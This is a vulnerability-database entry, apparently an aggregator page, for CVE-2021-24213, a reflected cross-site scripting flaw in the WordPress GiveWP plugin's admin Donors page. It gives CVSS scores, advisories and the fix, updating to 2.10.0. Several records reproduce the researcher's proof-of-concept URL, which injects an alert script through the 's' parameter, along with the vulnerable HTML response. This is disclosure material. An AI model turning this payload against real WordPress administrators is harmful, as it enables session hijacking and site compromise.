Description
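The GiveWP – Donation Plugin and Fundraising Platform WordPress plugin before 2.10.0 was affected by a reflected Cross-Site Scripting (XSS) vulnerability in the administration panel, via the 's' GET parameter on the Donors page. According to the related records below, the search value was echoed unescaped into the `value` attribute of the donor search input, the affected range is 2.4.0 up to (but not including) 2.10.0, triggering it requires an administrator to visit a crafted URL, and the fix is to update the plugin to 2.10.0 or later.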
Affected Software
Related
{"id": "CVE-2021-24213", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24213", "description": "The GiveWP \u2013 Donation Plugin and Fundraising Platform WordPress plugin before 2.10.0 was affected by a reflected Cross-Site Scripting vulnerability inside of the administration panel, via the 's' GET parameter on the Donors page.", "published": "2021-04-12T14:15:00", "modified": "2021-04-20T00:16:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24213", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "https://bentl.ee/posts/cve-givewp/"], "cvelist": ["CVE-2021-24213"], "immutableFields": [], "lastseen": "2022-03-23T14:49:29", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:161933"]}, {"type": "wpexploit", "idList": ["WPEX-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "wpvulndb", "idList": 
["WPVDB-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "zdt", "idList": ["1337DAY-ID-36018"]}], "rev": 4}, "score": {"value": 3.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:161933"]}, {"type": "wpexploit", "idList": ["WPEX-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309"]}, {"type": "zdt", "idList": ["1337DAY-ID-36018"]}]}, "exploitation": null, "vulnersScore": 3.6}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "givewp:give", "version": "2.10.0", "operator": "lt", "name": "givewp give"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:givewp:give:2.10.0:*:*:*:*:wordpress:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.10.0", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "name": "https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://bentl.ee/posts/cve-givewp/", "name": "https://bentl.ee/posts/cve-givewp/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"zdt": [{"lastseen": "2021-10-05T22:45:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "WordPress GiveWP 2.9.7 Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24213"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36018", "href": "https://0day.today/exploit/description/36018", "sourceData": "# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting\r\n# Exploit Author: Austin Bentley\r\n# Vendor Homepage: https://givewp.com/\r\n# Software Link: https://wordpress.org/plugins/give/\r\n# Version: 2.9.7\r\n# Tested on: Windows 7\r\n# CVE: CVE-2021-24213\r\nExploitation requirements: Admin must visit payload URL. Default config.\r\nTested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. 
Default configs on all products.\r\nVulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b\r\nActive Installations: 100,000+ per https://wordpress.org/plugins/give/\r\nResearcher: Austin Bentley (https://bentl.ee/)\r\nDetailed writeup available at httpS://bentl.ee/posts/cve-givewp/\r\n\r\nPoC URL:\r\nhttp://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors\r\n\r\nResponse:\r\n--- SNIP ---\r\n<div class=\"give-donor-search-box\">\r\n <input type=\"text\" id=\"give-donors-search-input\" placeholder=\"Name, Email, or Donor ID\" name=\"s\" value=\"\\\"><script>alert(0)</script>\">\r\n <input type=\"submit\" class=\"button\" value=\"Search\" ID=\"donor-search-submit\" />\r\n</div>\r\n--- SNIP ---\r\n\r\n\r\nDisclosure Log:\r\n3/21/2021 -- Emailed GiveWP for security contact information\r\n3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released)\r\n3/22/2021 -- Provided vendor with PoC\r\n3/22/2021 -- Vendor provided fix in 2.10.0\r\n3/23/2021 -- Fix validated, article posted, CVE unlocked\n\n# 0day.today [2021-10-06] #", "sourceHref": "https://0day.today/exploit/36018", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-04-20T23:25:47", "description": "The plugin was affected by a reflected Cross-Site Scripting vulnerability inside of the administration panel, via the 's' GET parameter on the Donors page.\n\n### PoC\n\nhttps://example.com/wp-admin/edit.php?s=%22%3E&start-date;&end-date;&form;_id=0&action;=-1&paged;=1&give;_action=delete_bulk_donor&orderby;=id&order;=DESC&action2;=-1&post;_type=give_forms&page;=give-donors&view;=donors \n", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "wpvulndb", "title": "GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {}, 
"cvelist": ["CVE-2021-24213"], "modified": "2021-03-24T06:00:56", "id": "WPVDB-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309", "href": "https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:33:04", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Austin Bentley in WordPress GiveWP plugin (versions <= 2.9.7).\n\n## Solution\n\n\r\n Update the WordPress GiveWP plugin to the latest available version (at least 2.10.0).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-03-23T00:00:00", "type": "patchstack", "title": "WordPress GiveWP plugin <= 2.9.7 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24213"], "modified": "2021-03-23T00:00:00", "id": "PATCHSTACK:1292BA209C5326D15C3947F835273E44", "href": "https://patchstack.com/database/vulnerability/give/wordpress-givewp-plugin-2-9-7-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-04-20T23:25:47", "description": "The plugin was affected by a reflected Cross-Site Scripting vulnerability inside of the administration panel, via the 's' GET parameter on the Donors page.\n", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "wpexploit", "title": "GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24213"], "modified": "2021-03-24T06:00:56", "id": "WPEX-ID:DA4AB508-A423-4C7F-A1D4-42EC6F989309", "href": "", "sourceData": "https://example.com/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors\r\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-03-23T16:45:00", "description": "", "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "WordPress GiveWP 2.9.7 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24213"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161933", "href": "https://packetstormsecurity.com/files/161933/WordPress-GiveWP-2.9.7-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting \n# Date: 3/23/2021 \n# Exploit Author: Austin Bentley \n# Vendor Homepage: https://givewp.com/ \n# Software Link: https://wordpress.org/plugins/give/ \n# Version: 2.9.7 \n# Tested on: Windows 7 \n# CVE: CVE-2021-24213 \nExploitation requirements: Admin must visit payload URL. Default config. \nTested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. Default configs on all products. 
\nVulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b \nActive Installations: 100,000+ per https://wordpress.org/plugins/give/ \nResearcher: Austin Bentley (https://bentl.ee/) \nDetailed writeup available at httpS://bentl.ee/posts/cve-givewp/ \n \nPoC URL: \nhttp://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors \n \nResponse: \n--- SNIP --- \n<div class=\"give-donor-search-box\"> \n<input type=\"text\" id=\"give-donors-search-input\" placeholder=\"Name, Email, or Donor ID\" name=\"s\" value=\"\\\"><script>alert(0)</script>\"> \n<input type=\"submit\" class=\"button\" value=\"Search\" ID=\"donor-search-submit\" /> \n</div> \n--- SNIP --- \n \n \nDisclosure Log: \n3/21/2021 -- Emailed GiveWP for security contact information \n3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released) \n3/22/2021 -- Provided vendor with PoC \n3/22/2021 -- Vendor provided fix in 2.10.0 \n3/23/2021 -- Fix validated, article posted, CVE unlocked \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161933/wpgivewp297-xss.txt"}]}